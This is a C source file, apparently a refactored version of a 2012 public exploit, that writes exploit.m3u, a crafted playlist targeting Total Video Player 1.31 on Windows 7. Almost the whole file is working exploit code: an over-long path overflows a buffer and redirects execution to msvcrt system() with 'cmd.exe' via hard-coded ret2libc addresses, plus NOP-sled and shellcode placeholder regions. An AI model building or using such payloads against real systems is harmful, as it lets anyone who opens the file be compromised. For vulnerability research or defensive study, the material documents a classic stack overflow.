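/*
 * 28-08-2012 Total Video Player V1.31 m3u playlist exploit
 * Local Exploit Written by GoTr00t
 * Tested on Windows 7
 * aksuumit[at]hotmail.com
 *
 * Writes exploit.m3u: an M3U playlist whose single entry is an over-long
 * path that, per the author's notes, overruns a fixed-size buffer in the
 * player. Instead of jumping into shellcode, the overwritten return address
 * is pointed at msvcrt!system() with "cmd.exe" as its argument (ret2libc).
 * The 0x90/0x55 regions are kept only as a placeholder for a real shellcode
 * variant of the same overflow.
 *
 * NOTE(review): the two absolute addresses below were read off the author's
 * Windows 7 msvcrt.dll. They only hold for that exact DLL build loaded at
 * that exact base; a different build, or the DLL being rebased (ASLR),
 * breaks the chain. Not re-verified here.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Payload geometry exactly as laid out by the original author. */
enum {
    FILLER_LEN    = 303,  /* 'A' bytes between the path prefix and the NOP sled */
    NOP_LEN       = 40,   /* 0x90 sled (not used by the ret2libc frame) */
    SHELLCODE_LEN = 160,  /* 0x55 placeholder; real shellcode would go here */
    PAYLOAD_CAP   = 3000  /* output buffer size of the original */
};

static const char HEADER[]      = "#EXTM3U\n#EXTINF:,\n";
static const char PATH_PREFIX[] = "c:\\";

/* Hard-coded gadgets, little-endian dwords. Author's comments:
 * 7694B177 = system() in msvcrt.dll, 7638BF27 = pointer to the string "cmd.exe". */
static const unsigned char SYSTEM_ADDR[4]  = { 0x77, 0xB1, 0x94, 0x76 };
/* What system() returns to; junk here, or a second gadget if building a ROP chain. */
static const unsigned char FAKE_RET[4]     = { 0x44, 0x44, 0x44, 0x44 };
static const unsigned char CMD_STR_ADDR[4] = { 0x27, 0xBF, 0x38, 0x76 };

/*
 * Append len bytes from src to buf at *pos without exceeding cap.
 * Returns 0 on success, -1 (buffer untouched) if the write would overflow.
 */
static int append(unsigned char *buf, size_t cap, size_t *pos,
                  const void *src, size_t len)
{
    if (len > cap - *pos) {
        return -1;
    }
    memcpy(buf + *pos, src, len);
    *pos += len;
    return 0;
}

/* Same contract as append(), but writes len copies of the byte b. */
static int append_fill(unsigned char *buf, size_t cap, size_t *pos,
                       int b, size_t len)
{
    if (len > cap - *pos) {
        return -1;
    }
    memset(buf + *pos, b, len);
    *pos += len;
    return 0;
}

/*
 * Build the playlist bytes into buf (capacity cap).
 * Returns the number of bytes written, or 0 if cap is too small.
 *
 * Layout (author's):
 *   HEADER | "c:\" | 303 x 'A' | 40 x 0x90 | 160 x 0x55 | &system | junk | &"cmd.exe"
 * The final three dwords are a cdecl system() frame: the saved return
 * address is replaced by system(), the next dword is where system()
 * returns to, and the last one is its single argument.
 *
 * Unlike the original, every region is written with an explicit length:
 * the original memset() fillers had no NUL terminator (and one
 * uninitialized byte), so strcat() read past them.
 */
static size_t build_playlist(unsigned char *buf, size_t cap)
{
    size_t pos = 0;

    if (append(buf, cap, &pos, HEADER, sizeof HEADER - 1) != 0 ||
        append(buf, cap, &pos, PATH_PREFIX, sizeof PATH_PREFIX - 1) != 0 ||
        append_fill(buf, cap, &pos, 0x41, FILLER_LEN) != 0 ||
        append_fill(buf, cap, &pos, 0x90, NOP_LEN) != 0 ||
        append_fill(buf, cap, &pos, 0x55, SHELLCODE_LEN) != 0 ||
        append(buf, cap, &pos, SYSTEM_ADDR, sizeof SYSTEM_ADDR) != 0 ||
        append(buf, cap, &pos, FAKE_RET, sizeof FAKE_RET) != 0 ||
        append(buf, cap, &pos, CMD_STR_ADDR, sizeof CMD_STR_ADDR) != 0) {
        return 0;
    }
    return pos;
}

/* Entry point: build the payload and write it to exploit.m3u in the cwd. */
int main(void)
{
    unsigned char payload[PAYLOAD_CAP];
    size_t len = build_playlist(payload, sizeof payload);

    if (len == 0) {
        fputs("payload does not fit in the output buffer\n", stderr);
        return EXIT_FAILURE;
    }

    /* "w" (text mode) is kept from the original: on Windows the '\n' in the
     * header are emitted as "\r\n", which is what the author tested against. */
    FILE *fp = fopen("exploit.m3u", "w");
    if (fp == NULL) {
        perror("fopen exploit.m3u");
        return EXIT_FAILURE;
    }

    /* fwrite with an explicit length: the payload is raw bytes and must never
     * be passed to fprintf() as a format string as the original did. */
    if (fwrite(payload, 1, len, fp) != len) {
        perror("fwrite exploit.m3u");
        fclose(fp);
        return EXIT_FAILURE;
    }

    /* fclose() flushes; a failure here means the file on disk is incomplete. */
    if (fclose(fp) != 0) {
        perror("fclose exploit.m3u");
        return EXIT_FAILURE;
    }

    printf("Exploit written!\n");
    return 0;
}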